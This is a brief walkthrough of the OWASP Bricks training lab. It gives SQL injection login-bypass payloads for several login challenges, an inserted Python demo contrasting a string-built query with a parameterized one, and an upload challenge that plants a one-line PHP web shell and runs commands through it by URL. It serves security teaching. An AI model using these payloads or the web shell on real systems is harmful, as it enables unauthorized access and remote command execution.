Introduction
Download: https://sourceforge.net/projects/owaspbwa/files/
GitHub: https://github.com/chuckfw/owaspbwa/wiki/UserGuide
0x001 Login #1
Intercept the submission with Burp and modify it to probe for injection:
username=test'&passwd=test'&submit=Submit
#SQL Query: SELECT * FROM users WHERE name='test'' and password='test''
Intercept the submission with Burp and modify it to bypass the login:
username=test' or 1=1-- -&passwd=test&submit=Submit
0x002 Login #2
Same as Login #1, bypass the login:
username=test' or 1=1-- -&passwd=test&submit=Submit
0x003 Login #3
username=test&passwd=test') or 1=1-- -&submit=Submit
0x004 Login #4
#4, #5 and #6 are bypassed with the same injection as above.
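Added example (not from this walkthrough and not Bricks' own code): a Python/sqlite3 model of the Login #1 query shown above, run with the page's payloads against the string-built query and against a parameterized one. The users table is constructed demo data, and the parenthesized query shape used for the Login #3 payload is an assumption.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the Bricks users table (demo data, not the app's).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, passwd, parenthesized=False):
    # Builds the query the way the Login #1 probe reveals it: input is pasted
    # straight into the SQL text, so a quote in the input changes the statement.
    # parenthesized=True models the query shape the Login #3 payload targets;
    # that shape is an assumption for this demo.
    cond = "name='" + username + "' and password='" + passwd + "'"
    if parenthesized:
        cond = "(" + cond + ")"
    try:
        row = conn.execute("SELECT * FROM users WHERE " + cond).fetchone()
    except sqlite3.OperationalError:
        # A lone quote breaks the syntax: the error the page's first probe provokes.
        return None
    return row is not None

def login_safe(conn, username, passwd):
    # Hardened form: placeholders bind the input as data, never as SQL tokens.
    row = conn.execute(
        "SELECT * FROM users WHERE name=? and password=?",
        (username, passwd)).fetchone()
    return row is not None

def compare(username, passwd, parenthesized=False):
    # Runs one credential pair through both versions of the login check.
    conn = make_db()
    return (login_vulnerable(conn, username, passwd, parenthesized),
            login_safe(conn, username, passwd))

if __name__ == "__main__":
    for u, p, paren in [("alice", "s3cret", False),
                        ("test'", "test'", False),
                        ("test' or 1=1-- -", "test", False),
                        ("test", "test') or 1=1-- -", True)]:
        print(repr(u), repr(p), "->", compare(u, p, paren))
```

The first element of each result is the string-built query (None meaning a SQL syntax error leaked), the second the parameterized one; only valid credentials pass the hardened check.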
0x005 Upload #1
Upload webshell.php, then reach it via the file path http://192.168.1.105/owaspbricks/upload-1/uploads/shell.php?cmd=%20id
cat shell.php
<?php system($_GET["cmd"]); ?>